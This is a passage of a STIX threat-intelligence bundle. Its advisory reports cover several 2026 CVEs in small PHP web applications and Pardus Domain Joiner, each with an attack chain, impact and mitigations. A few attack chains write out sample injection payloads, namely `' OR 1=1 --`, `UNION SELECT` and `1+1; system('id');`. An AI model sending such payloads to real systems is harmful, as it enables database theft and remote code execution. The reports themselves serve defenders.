high risk. This can result in significant financial losses, reputational damage, regulatory fines, and loss of customer trust.\n\n## Recommendation\n\n*   Immediately patch or upgrade code-projects Hotel and Tourism Reservation to a version that addresses CVE-2026-14755, if available. If no patch exists, remove the application from production until a secure version is released.\n*   Deploy the provided Sigma rule to detect attempts to exploit CVE-2026-14755 via the `/admin/reservations.php` endpoint in your web server logs.\n*   Implement a Web Application Firewall (WAF) to inspect and block malicious HTTP requests, specifically those targeting `/admin/reservations.php` with SQL injection payloads in the `delete` parameter.\n*   Review web server access logs for anomalous requests to the `/admin/reservations.php` path, especially those containing common SQL injection keywords or unusual characters in query parameters.\n",
      "published": "2026-07-05T15:19:25Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "cve",
        "remote-code-execution",
        "data-exfiltration"
      ],
      "object_refs": [
        "indicator--c3e52630-11d5-54ae-9563-464e2f3e0286",
        "indicator--bbe7434e-7bb7-56c6-afa7-16053869972f",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14755"
        },
        {
          "source_name": "reference",
          "url": "https://raw.githubusercontent.com/anubhavv106/Security-Advisories/refs/heads/main/Hotel-Tourism-Reservation-add_event.php-SQLi.md"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14755"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--54f24ea6-6a19-5a8c-a04f-738326dab408",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-12250: Pardus Domain Joiner Vulnerability Exposes Sensitive Information",
      "description": "## Overview\n\nCVE-2026-12250 identifies a critical flaw within the TUBITAK BILGEM Software Technologies Research Institute's Pardus Domain Joiner, impacting versions from 0.5.2 up to, but not including, 0.5.4. This vulnerability, categorized as CWE-214 (Invocation of Process Using Visible Sensitive Information), could allow an attacker with local access to discover and \"excavate\" sensitive data. The issue stems from processes being invoked in a manner where confidential details, such as credentials, are exposed through visible means like command-line arguments or process listings. For organizations utilizing Pardus Domain Joiner, this presents a significant risk of unauthorized information disclosure, potentially leading to privilege escalation or further compromise of the domain-joined systems.\n\n## Attack Chain\n\nThe NVD entry describes a software vulnerability (CWE-214) rather than a complete attack chain with distinct stages of observed attacker activity. The vulnerability primarily concerns sensitive information being exposed locally during process invocation. An attacker would need local access to the affected system to observe these exposed details.\n\n## Impact\n\nThe primary impact of CVE-2026-12250 is the unauthorized disclosure or \"excavation\" of sensitive information. If exploited, an attacker with local access to a system running the vulnerable Pardus Domain Joiner could potentially obtain credentials, configuration details, or other confidential data that are improperly exposed during process invocation. This data exposure can compromise user accounts, lead to unauthorized access to domain resources, or facilitate lateral movement within the network. While no specific victim counts or targeted sectors are provided, any organization leveraging the affected Pardus Domain Joiner versions is at risk of severe data breaches and system compromise.\n\n## Recommendation\n\n*   Prioritize patching CVE-2026-12250 by upgrading Pardus Domain Joiner to version 0.5.4 or later immediately.\n*   Review system configurations to ensure sensitive information is not exposed through visible process arguments or environment variables on systems running Pardus Domain Joiner.\n*   Implement Principle of Least Privilege for all user accounts and services to minimize the impact of any potential information exposure.\n",
      "published": "2026-07-05T15:18:34Z",
      "labels": [
        "vulnerability",
        "linux",
        "data-exposure",
        "pardus"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12250"
        },
        {
          "source_name": "reference",
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0498"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--730d7024-bffe-5217-b59f-fd826dfd8852",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--52e9ad27-f686-5783-b5bf-0532eb31836e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--52e9ad27-f686-5783-b5bf-0532eb31836e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14754: SQL Injection in code-projects Hotel and Tourism Reservation",
      "description": "## Overview\n\nCVE-2026-14754 details a high-severity SQL injection vulnerability affecting code-projects Hotel and Tourism Reservation version 1.0. This flaw, discovered in an unspecified function within the `/admin/add_room.php` file, allows remote, unauthenticated attackers to inject malicious SQL queries by manipulating specific arguments like `delete_image`, `edit`, `description`, `number`, `price`, `rooms`, or `type`. The exploit for this vulnerability has been publicly disclosed and is actively available, increasing the immediate risk to organizations using the affected software. Given its remote exploitability and the availability of public exploits, this vulnerability poses a significant threat to the confidentiality and integrity of data stored within the application's database. Defenders should prioritize patching or implementing strong input validation to prevent exploitation.\n\n## Attack Chain\n\n1.  **Initial Access**: An unauthenticated attacker sends an HTTP POST or GET request to the `/admin/add_room.php` endpoint of the vulnerable Hotel and Tourism Reservation 1.0 web application.\n2.  **Parameter Manipulation**: The attacker crafts the request to include malicious SQL syntax within one of the vulnerable arguments (e.g., `delete_image`, `edit`, `description`, `number`, `price`, `rooms`, or `type`).\n3.  **SQL Injection**: The web application processes the request, and due to insufficient input sanitization, the embedded malicious SQL payload is passed directly to the backend database for execution.\n4.  **Database Interaction**: The database server executes the attacker-controlled SQL query, which can be designed to retrieve, modify, or delete sensitive information.\n5.  **Information Disclosure**: The results of the malicious SQL query, such as sensitive user credentials, payment information, or other confidential data, are returned within the HTTP response to the attacker.\n6.  **Data Exfiltration**: The attacker extracts the disclosed sensitive data, compromising the confidentiality of the application's database content.\n7.  **Impact**: The successful SQL injection allows unauthorized access to the application's database, leading to potential data theft, manipulation, or denial of service, depending on the attacker's objectives and database privileges.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14754 directly compromises the confidentiality and integrity of the data stored within the application's database. Attackers can exfiltrate sensitive customer and reservation data, modify booking details, or potentially manipulate administrator credentials for further access. While a specific number of victims is not available, any organization utilizing code-projects Hotel and Tourism Reservation 1.0 is at risk, particularly those with internet-facing deployments. The remote nature of the attack means that compromise can occur without physical access or prior authentication, making the impact widespread for affected instances.\n\n## Recommendation\n\n*   **Patch**: Immediately apply any available patches or updates for code-projects Hotel and Tourism Reservation 1.0 as they become available to address CVE-2026-14754.\n*   **Implement Input Validation**: Deploy the Sigma rule `CVE-2026-14754: Detect SQL Injection Attempts in Hotel Reservation System` to your web application firewall (WAF) or SIEM to detect and potentially block requests containing SQL injection payloads targeting `/admin/add_room.php`.\n*   **Monitor Web Server Logs**: Ensure comprehensive logging is enabled for your web server (e.g., IIS, Apache, Nginx) to capture detailed HTTP request information, including full URI-stem and query parameters, which are crucial for activating the detection rule above.\n*   **Review Database Privileges**: Restrict the privileges of the database user account used by the web application to the absolute minimum necessary to function, thereby limiting the potential damage from a successful SQL injection.\n",
      "published": "2026-07-05T14:22:49Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "code-projects",
        "remote-code-execution"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14754"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://medium.com/@avdzav10/sql-injection-in-hotel-and-tourism-reservation-system-php-1-0-admin-add-room-php-25149909c16a"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14754"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/850344"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376343"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376343/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--017c7bfd-173a-5c9a-a01f-6eb10a215489",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_sha1: 327d1b0f2915ba79d7ef8ebb74553e987609d9be",
      "pattern": "[x-ti-bot:hash_sha1 = '327d1b0f2915ba79d7ef8ebb74553e987609d9be']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T14:21:51Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b93dfbbf-5e5b-570b-8300-1717b831c4a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--af535fb5-3734-5d2e-86fc-1717a681b0b1",
      "target_ref": "indicator--017c7bfd-173a-5c9a-a01f-6eb10a215489"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3ba6c35c-724f-5101-a49e-a1b396d87736",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--af535fb5-3734-5d2e-86fc-1717a681b0b1",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5b1d86be-0b31-56db-9a86-325fe191d5a2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--af535fb5-3734-5d2e-86fc-1717a681b0b1",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--af535fb5-3734-5d2e-86fc-1717a681b0b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14753: mjperpinosa stumasy Authorization Bypass",
      "description": "## Overview\n\nA significant authorization bypass vulnerability, identified as CVE-2026-14753, has been discovered in mjperpinosa stumasy, affecting all versions up to and including commit `327d1b0f2915ba79d7ef8ebb74553e987609d9be`. This flaw exists within an unspecified function of the `/PHP/objects/notes` file, part of the Note Handler/Assignment Handler component. Exploitation occurs when a remote attacker manipulates the `assignment_item_id` argument, leading to an authorization bypass. The vulnerability is considered critical due to a publicly available exploit, enabling immediate threat to affected systems. As mjperpinosa stumasy utilizes continuous delivery with rolling releases, specific version details for affected or patched releases are not available, complicating remediation efforts. While the project was notified via an issue report, no response or fix has been released to date, making immediate detection and mitigation crucial for defenders.\n\n## Attack Chain\n\n1.  An attacker identifies a publicly accessible instance of mjperpinosa stumasy.\n2.  The attacker crafts a malicious HTTP request targeting the `/PHP/objects/notes` endpoint of the application.\n3.  Within this request, the attacker manipulates the `assignment_item_id` argument to an unauthorized or unintended value.\n4.  The vulnerable stumasy application processes the malformed request through its Note Handler/Assignment Handler component.\n5.  Due to the flaw, the application's authorization checks are bypassed, granting the attacker unauthorized access.\n6.  The attacker can now perform actions or access data that would normally require higher privileges or proper authorization within the stumasy application.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14753 allows a remote attacker to bypass authorization controls within mjperpinosa stumasy. This can lead to unauthorized access to sensitive notes, assignments, or potentially other functionalities handled by the affected component. Given the nature of an authorization bypass, an attacker could escalate privileges, modify or delete data, or access information they are not permitted to see, depending on the context of the Note Handler/Assignment Handler. The availability of a public exploit significantly increases the risk of widespread attacks against unpatched or unmitigated instances, potentially compromising the integrity and confidentiality of data managed by the stumasy application.\n\n## Recommendation\n\n*   If mjperpinosa releases a fix, apply it immediately to all stumasy instances due to the public exploit (CVE-2026-14753).\n*   Monitor web server access logs for suspicious HTTP requests targeting the `/PHP/objects/notes` path that include unusual or malformed `assignment_item_id` parameters.\n*   Deploy a Web Application Firewall (WAF) to detect and block requests that attempt to manipulate the `assignment_item_id` argument, looking for patterns indicative of authorization bypass attempts against the Note Handler/Assignment Handler component.\n*   Regularly review audit logs for the stumasy application for any unauthorized actions or access patterns observed within the Note Handler/Assignment Handler component.\n",
      "published": "2026-07-05T14:21:51Z",
      "labels": [
        "authorization-bypass",
        "web-application",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "indicator--017c7bfd-173a-5c9a-a01f-6eb10a215489",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14753"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--809605ea-6594-533a-ae9a-5576b95ae5f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9486821e-bf48-5178-a427-f4125bb93315",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6eb45b24-b868-5cf9-877d-a8aca213d7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9486821e-bf48-5178-a427-f4125bb93315",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aed8802a-bc2d-5dfe-843e-a87d6bd155ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9486821e-bf48-5178-a427-f4125bb93315",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9486821e-bf48-5178-a427-f4125bb93315",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14750 — SQL Injection in mjperpinosa stumasy via Password Argument",
      "description": "## Overview\n\nA critical security flaw, identified as CVE-2026-14750, has been discovered in the mjperpinosa stumasy web application, affecting all versions up to and including commit 327d1b0f2915ba79d7ef8ebb74553e987609d9be. The vulnerability is a remote SQL injection residing within the `Notes_controller::accessing_dictionary_authorization` function, specifically through the manipulation of the 'Password' argument in the file `application/PHP/objects/notes/accessing_dictionary_authorization.php`. This flaw permits remote attackers to execute arbitrary SQL commands, potentially leading to unauthorized data access, modification, or even full compromise of the underlying database and host server. An exploit for this vulnerability has been publicly released, making affected systems highly susceptible to immediate attack. The project maintainers were notified of the issue but have not yet released a patch or responded to the report.\n\n## Attack Chain\n\n1.  Attacker identifies a publicly accessible instance of mjperpinosa stumasy.\n2.  Attacker crafts a malicious HTTP POST request targeting the `application/PHP/objects/notes/accessing_dictionary_authorization.php` endpoint.\n3.  The request includes a specially crafted 'Password' argument containing SQL injection payloads (e.g., `' OR 1=1 --`, `UNION SELECT`).\n4.  The `Notes_controller::accessing_dictionary_authorization` function processes the vulnerable 'Password' argument without proper sanitization.\n5.  The application's backend database executes the attacker's embedded SQL query due to the injection.\n6.  Depending on the payload, the attacker bypasses authentication, extracts sensitive database contents, or manipulates existing data.\n7.  With sufficient database privileges, the attacker may write arbitrary files (e.g., web shells) to the server, achieving remote code execution.\n8.  The attacker achieves unauthorized access to the application's data or the underlying server, enabling further reconnaissance, data exfiltration, or system compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14750 grants unauthenticated remote attackers the ability to execute arbitrary SQL commands against the mjperpinosa stumasy application's database. This can lead to severe consequences including, but not limited to, unauthorized access to sensitive user data, complete database compromise, modification or deletion of application data, and potential remote code execution on the server if the database user has file system privileges (e.g., using `INTO OUTFILE`). Given the public availability of an exploit, organizations using affected versions of stumasy face an immediate and high risk of data breaches, system defacement, or complete server takeover.\n\n## Recommendation\n\n*   Prioritize patching mjperpinosa stumasy to a secure version as soon as one becomes available.\n*   Deploy the Sigma rule provided in this brief to your SIEM to detect attempts at SQL injection against your web servers.\n*   Implement a Web Application Firewall (WAF) to filter and block malicious SQL injection payloads targeting HTTP request parameters like `Password`.\n*   Review web server access logs for the `application/PHP/objects/notes/accessing_dictionary_authorization.php` endpoint for unusual HTTP POST requests or suspicious query parameters.\n",
      "published": "2026-07-05T14:21:02Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "unauthenticated",
        "remote-code-execution",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14750"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d58b2509-3a27-58c0-8327-0106e13c2166",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb850bfa-87e2-547d-80b9-526a0e9b5f6e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--555f4f59-f562-5848-994e-786d7ee44927",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bb850bfa-87e2-547d-80b9-526a0e9b5f6e",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bb850bfa-87e2-547d-80b9-526a0e9b5f6e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14749: mjperpinosa stumasy Code Injection Vulnerability",
      "description": "## Overview\n\nA critical code injection vulnerability, identified as CVE-2026-14749, exists in mjperpinosa stumasy, affecting versions up to commit 327d1b0f2915ba79d7ef8ebb74553e987609d9be. This flaw resides within the `eval` function in the `application/pages/imba_calculator/calculate.php` file, allowing remote attackers to execute arbitrary code by manipulating the `mathematical_sentence` argument. The vulnerability has a CVSS v3.1 Base Score of 7.3 and is publicly exploitable. While the product utilizes a rolling release strategy, preventing the enumeration of specific affected or patched versions, the vendor has not yet responded to the reported issue, leaving deployments exposed. Defenders must be aware that readily available exploits facilitate widespread targeting of unpatched instances.\n\n## Attack Chain\n\n1. An attacker identifies a public-facing instance of mjperpinosa stumasy.\n2. The attacker crafts an HTTP POST or GET request targeting the `application/pages/imba_calculator/calculate.php` endpoint on the vulnerable server.\n3. The request includes a specially crafted `mathematical_sentence` parameter containing arbitrary PHP code (e.g., `1+1; system('id');`).\n4. The vulnerable `eval` function in `application/pages/imba_calculator/calculate.php` processes the `mathematical_sentence` argument without proper sanitization.\n5. The malicious PHP code embedded within the `mathematical_sentence` argument is executed by the server process.\n6. The server's HTTP response may reveal the output of the executed command, confirming successful code injection and providing initial access.\n7. The attacker leverages this remote code execution to download further malware, establish persistence, exfiltrate sensitive data, or perform other malicious actions on the compromised server.\n\n## Impact\n\nThe exploitation of CVE-2026-14749 grants remote attackers arbitrary code execution capabilities on affected mjperpinosa stumasy instances. Given the public availability of an exploit and the vendor's non-response to the reported issue, organizations running this software are at high risk. Successful exploitation can lead to complete system compromise, data theft, defacement, or further lateral movement within the network, potentially impacting critical business operations and exposing sensitive information to unauthorized parties.\n\n## Recommendation\n\n*   Deploy the `Detects CVE-2026-14749 Exploitation — stumasy Code Injection` Sigma rule to your SIEM and tune for your environment to identify exploitation attempts.\n*   Implement a Web Application Firewall (WAF) to detect and block suspicious requests containing shell metacharacters targeting `application/pages/imba_calculator/calculate.php` as identified by the `Detects CVE-2026-14749 Exploitation — stumasy Code Injection` Sigma rule.\n*   Monitor web server access logs for requests to `application/pages/imba_calculator/calculate.php` with unusual `mathematical_sentence` parameter values, indicating potential code injection attempts.\n*   Prioritize patching or implementing compensating controls for any mjperpinosa stumasy deployments until the vendor releases a fix for CVE-2026-14749.\n",
      "published": "2026-07-05T13:22:39Z",
      "labels": [
        "web-vulnerability",
        "code-injection",
        "rce",
        "php"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14749"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b5cdb60e-80b3-541e-8d49-f36f6f540d8e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--15f48137-8128-5239-8e6b-733766060d03",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--15f48137-8128-5239-8e6b-733766060d03",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14747: SQL Injection in code-projects Real State Services 1.0",
      "description": "## Overview\n\nA critical SQL Injection vulnerability, tracked as CVE-2026-14747, has been identified in version 1.0 of the code-projects Real State Services application. This flaw resides within an unspecified function of the `/addprojectsale.php` file, where improper handling of user-supplied input to the `amen` argument allows for remote, unauthenticated attackers to inject and execute arbitrary SQL commands. This enables attackers to bypass security measures, extract sensitive information from the underlying database, or potentially achieve further system compromise depending on the database's privileges. The vulnerability was publicly disclosed on July 5, 2026, by VulDB and is a significant concern for organizations using this specific version of the Real State Services application, as exploitation can lead to severe data breaches.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a web-facing instance of code-projects Real State Services 1.0.\n2. The attacker crafts a specially designed HTTP POST request targeting the `/addprojectsale.php` endpoint.\n3. This request includes a malicious SQL injection payload within the `amen` parameter, bypassing input validation.\n4. The vulnerable application processes the request, incorporating the unsanitized `amen` parameter value directly into a database query.\n5. The backend SQL database executes the attacker-supplied malicious SQL commands, leading to unauthorized access.\n6. Successful exploitation allows the attacker to read, modify, or delete database contents, extract sensitive data, or potentially establish persistence (e.g., by writing a web shell if sufficient database privileges exist).\n7. The attacker then proceeds with data exfiltration or further compromise of the affected web server.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14747 can lead to severe consequences for organizations utilizing code-projects Real State Services 1.0. Attackers can gain complete control over the application's database, leading to unauthorized disclosure of sensitive customer data, property listings, or internal operational information. This can result in significant financial losses, reputational damage, regulatory penalties, and potential service disruption. The remote and unauthenticated nature of the vulnerability means that any internet-exposed instance of the application is at risk, potentially affecting numerous small to medium-sized businesses in the real estate sector.\n\n## Recommendation\n\n*   Immediately update code-projects Real State Services to a patched version once available to remediate CVE-2026-14747.\n*   Deploy the provided Sigma rule to your SIEM solution to detect exploitation attempts against CVE-2026-14747.\n*   Review web server logs for suspicious activity targeting `/addprojectsale.php` with SQL injection patterns.\n*   Implement a Web Application Firewall (WAF) in front of the application to filter and block malicious SQL injection payloads.\n",
      "published": "2026-07-05T13:21:42Z",
      "labels": [
        "sql-injection",
        "web-exploitation",
        "cve",
        "php",
        "real-state"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14747"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/6Justdododo6/CVE/issues/26"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14747"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/849291"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376333"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376333/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--52a6d2b7-ea1e-5fc4-918b-8cca4ec040ad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1086443a-b4c8-5bb4-8fa3-6ce9e9db9034",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1086443a-b4c8-5bb4-8fa3-6ce9e9db9034",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14746: SQL Injection in code-projects Real State Services",
